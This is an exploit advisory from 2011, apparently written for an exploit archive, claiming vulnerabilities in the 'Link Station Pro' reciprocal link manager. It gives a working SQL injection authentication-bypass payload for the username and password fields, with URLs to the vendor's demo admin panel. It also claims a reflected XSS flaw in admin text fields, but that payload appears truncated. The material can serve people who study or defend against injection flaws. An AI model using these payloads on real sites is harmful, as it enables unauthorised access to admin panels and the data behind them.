%+ $.......#........4.........|)........0............\/\/ %+ %+ %+ %++++++++++++++++++++++++++++++++++++++++ # Exploit Title: Link Station Pro Multiple Vulnerabilities # Vendor: www.linkstationpro.com # Date: 28th july,2011 # Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D ( http://www.shadowrootkit.wordpress.com) # Google Dork: © 2011 Copyright SteveDawson.com ***************************************************************************************************************************************************************************************** BREIF DESCRIPTION ***************************** Link Station Pro is without doubt, the most efficient, easiest and most configurable reciprocal link management tool available for all your reciprocal link requirements. ****************************************************************************************************************************************************************************************** (Auth ByPass) SQLi Vulnerability *************************************** {DEMO} : http://www.linkstationpro.com/Partners/admindemo/index.php EXPLOIT: Username: ' or 'bug'='bug' # Password: ' or 'bug'='bug' # Observe: Attackers can use Authentication Bypass to get into Admin Panel in the site. Reflected XSS Vulnerability ******************************** EXPLOIT 2: XSS Vulnerability in admin panel(in most of the text fields) {Demo}: http://www.linkstationpro.com/Partners/admindemo/manage_categories.php Exploit: ">>

XSSed_by_r007k17

 ***************************************************************************************************************************************************************************************** gr33t1ngs to s1d3 effects and my friends@!3.14-- *****************************************************************************************************************************************************************************************